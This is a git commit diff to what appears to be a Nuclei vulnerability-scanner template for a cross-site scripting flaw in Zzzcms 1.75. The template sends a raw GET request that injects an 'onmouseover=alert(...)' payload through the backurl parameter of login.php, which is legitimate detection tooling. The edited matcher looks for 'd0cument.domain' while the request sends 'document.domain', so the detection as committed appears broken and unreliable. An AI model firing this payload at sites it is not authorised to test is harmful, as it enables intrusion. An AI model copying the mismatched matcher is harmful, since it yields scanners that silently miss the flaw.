added reference
parent
cf6628114b
commit
7ca836f403
|
@ -4,6 +4,8 @@ info:
|
|||
name: Zzzcms 1.75 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
reference:
|
||||
- https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
|
@ -14,7 +16,7 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/XSS/)%20y%3d HTTP/1.1
|
||||
GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
|
@ -22,7 +24,7 @@ http:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'onmouseover=alert(/XSS/) y=&act'
|
||||
- 'onmouseover=alert(/d0cument.domain/) y=&act'
|
||||
- 'document.write("'
|
||||
condition: and
|
||||
|
||||
|
|
Loading…
Reference in New Issue